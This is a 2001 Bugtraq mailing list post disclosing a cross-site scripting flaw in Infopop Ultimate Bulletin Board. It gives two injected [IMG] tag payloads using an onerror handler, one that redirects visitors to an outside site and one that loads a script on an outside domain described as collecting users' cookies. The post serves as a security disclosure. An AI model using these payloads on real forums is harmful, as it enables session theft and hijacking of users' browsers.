Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

UBB vulnerablietis + about: using example

From: kyprizel <kyprizel () hostel tusur ru>
Date: Fri, 16 Nov 2001 02:10:50 +0700
Здравствуйте, уважаемый(ая) bugtraq,
  Posting something like this UBB tag:
  [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG]
  to Infopop Ultimate Bulletin
  Board, we are able to redirect users browser to http://punk.tomsk.ru
  There are many ways to stole cookies using this vulnerabliety, one
  of them:
  [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG]
   and yourscript.php - is a script to recieve users cookies 8)
  
  


  --
 // Э.Заитов AKA kyprizel                        mailto:kyprizel () hostel tusur ru
                                                 ICQ#3337333
  --
 "Knowlege itself is power..."
  F.Bacon
  --
Previous By Date Next
Previous By Thread Next

Current thread: